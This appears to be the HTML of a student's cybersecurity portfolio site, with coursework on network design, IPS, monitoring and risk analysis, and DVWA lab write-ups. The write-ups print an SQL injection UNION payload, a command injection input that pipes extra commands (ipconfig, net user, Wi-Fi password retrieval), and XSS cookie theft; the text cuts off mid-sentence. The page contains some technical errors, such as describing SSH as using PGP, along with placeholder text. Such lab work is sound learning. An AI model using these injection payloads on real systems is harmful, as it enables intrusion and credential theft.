          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
